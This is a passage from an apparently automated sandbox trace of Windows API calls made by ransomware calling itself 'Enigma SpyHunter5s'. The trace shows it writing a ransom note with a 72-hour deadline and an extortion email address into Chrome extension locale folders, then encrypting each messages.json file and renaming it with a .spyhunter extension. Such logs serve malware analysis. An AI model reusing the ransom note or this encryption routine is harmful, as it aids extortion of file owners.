nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ec1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ec1c*=0x2800, lpOverlapped=0x0) returned 1 [0157.338] GetProcessHeap () returned 0x2c0000 [0157.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.338] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.338] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec1c, lpOverlapped=0x0 | out: lpBuffer=0x248ec5c*, lpNumberOfBytesWritten=0x248ec1c*=0x4, lpOverlapped=0x0) returned 1 [0157.338] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec1c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec1c*=0x30, lpOverlapped=0x0) returned 1 [0157.338] CloseHandle (hObject=0xb0) returned 1 [0157.339] GetProcessHeap () returned 0x2c0000 [0157.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.339] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.spyhunter") returned 174 [0157.339] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.spyhunter")) returned 1 [0157.340] GetProcessHeap () returned 0x2c0000 [0157.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.340] GetProcessHeap () returned 0x2c0000 [0157.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0157.340] GetProcessHeap () returned 0x2c0000 [0157.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3005f78 | out: hHeap=0x2c0000) returned 1 [0157.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.342] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.342] WriteFile (in: hFile=0xb0, lpBuffer=0x248eb8f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ecb8, lpOverlapped=0x0 | out: lpBuffer=0x248eb8f*, lpNumberOfBytesWritten=0x248ecb8*=0x127, lpOverlapped=0x0) returned 1 [0157.342] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.342] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ecb8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ecb8*=0x2ac, lpOverlapped=0x0) returned 1 [0157.343] CloseHandle (hObject=0xb0) returned 1 [0157.343] GetProcessHeap () returned 0x2c0000 [0157.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3005de0 | out: hHeap=0x2c0000) returned 1 [0157.343] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec58 | out: pbBuffer=0x248ec58) returned 1 [0157.343] GetProcessHeap () returned 0x2c0000 [0157.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0157.343] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec50*=0x30) returned 1 [0157.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json") returned 164 [0157.344] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.344] GetProcessHeap () returned 0x2c0000 [0157.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.344] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ec14*=0x2800, lpOverlapped=0x0) returned 1 [0157.360] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.360] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ec14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ec14*=0x2800, lpOverlapped=0x0) returned 1 [0157.361] GetProcessHeap () returned 0x2c0000 [0157.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.361] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.361] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec14, lpOverlapped=0x0 | out: lpBuffer=0x248ec54*, lpNumberOfBytesWritten=0x248ec14*=0x4, lpOverlapped=0x0) returned 1 [0157.361] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec14, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec14*=0x30, lpOverlapped=0x0) returned 1 [0157.361] CloseHandle (hObject=0xb0) returned 1 [0157.361] GetProcessHeap () returned 0x2c0000 [0157.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.361] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.spyhunter") returned 174 [0157.361] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.spyhunter")) returned 1 [0157.362] GetProcessHeap () returned 0x2c0000 [0157.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.363] GetProcessHeap () returned 0x2c0000 [0157.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0157.363] GetProcessHeap () returned 0x2c0000 [0157.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3005c48 | out: hHeap=0x2c0000) returned 1 [0157.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.364] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.364] WriteFile (in: hFile=0xb0, lpBuffer=0x248eb87*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ecb0, lpOverlapped=0x0 | out: lpBuffer=0x248eb87*, lpNumberOfBytesWritten=0x248ecb0*=0x127, lpOverlapped=0x0) returned 1 [0157.364] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.364] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ecb0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ecb0*=0x2ac, lpOverlapped=0x0) returned 1 [0157.365] CloseHandle (hObject=0xb0) returned 1 [0157.365] GetProcessHeap () returned 0x2c0000 [0157.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f25648 | out: hHeap=0x2c0000) returned 1 [0157.365] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec50 | out: pbBuffer=0x248ec50) returned 1 [0157.365] GetProcessHeap () returned 0x2c0000 [0157.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0157.365] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec48*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec48*=0x30) returned 1 [0157.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.366] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json") returned 164 [0157.366] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.366] GetProcessHeap () returned 0x2c0000 [0157.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.366] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ec0c*=0x2800, lpOverlapped=0x0) returned 1 [0157.467] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.467] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ec0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ec0c*=0x2800, lpOverlapped=0x0) returned 1 [0157.467] GetProcessHeap () returned 0x2c0000 [0157.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.467] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.467] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec0c, lpOverlapped=0x0 | out: lpBuffer=0x248ec4c*, lpNumberOfBytesWritten=0x248ec0c*=0x4, lpOverlapped=0x0) returned 1 [0157.684] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec0c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec0c*=0x30, lpOverlapped=0x0) returned 1 [0157.685] CloseHandle (hObject=0xb0) returned 1 [0157.685] GetProcessHeap () returned 0x2c0000 [0157.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.685] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.spyhunter") returned 174 [0157.685] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.spyhunter")) returned 1 [0157.686] GetProcessHeap () returned 0x2c0000 [0157.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.686] GetProcessHeap () returned 0x2c0000 [0157.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0157.687] GetProcessHeap () returned 0x2c0000 [0157.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f254b0 | out: hHeap=0x2c0000) returned 1 [0157.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.688] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.688] WriteFile (in: hFile=0xb0, lpBuffer=0x248eb7f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248eca8, lpOverlapped=0x0 | out: lpBuffer=0x248eb7f*, lpNumberOfBytesWritten=0x248eca8*=0x127, lpOverlapped=0x0) returned 1 [0157.689] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.689] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248eca8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248eca8*=0x2ac, lpOverlapped=0x0) returned 1 [0157.692] CloseHandle (hObject=0xb0) returned 1 [0157.692] GetProcessHeap () returned 0x2c0000 [0157.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f244c0 | out: hHeap=0x2c0000) returned 1 [0157.692] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec48 | out: pbBuffer=0x248ec48) returned 1 [0157.692] GetProcessHeap () returned 0x2c0000 [0157.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0157.692] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec40*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec40*=0x30) returned 1 [0157.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.695] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json") returned 164 [0157.695] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.695] GetProcessHeap () returned 0x2c0000 [0157.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.695] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248ec04*=0x2800, lpOverlapped=0x0) returned 1 [0157.696] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.696] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ec04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248ec04*=0x2800, lpOverlapped=0x0) returned 1 [0157.697] GetProcessHeap () returned 0x2c0000 [0157.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.697] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.697] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec04, lpOverlapped=0x0 | out: lpBuffer=0x248ec44*, lpNumberOfBytesWritten=0x248ec04*=0x4, lpOverlapped=0x0) returned 1 [0157.698] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec04, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec04*=0x30, lpOverlapped=0x0) returned 1 [0157.698] CloseHandle (hObject=0xb0) returned 1 [0157.700] GetProcessHeap () returned 0x2c0000 [0157.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.700] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.spyhunter") returned 174 [0157.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 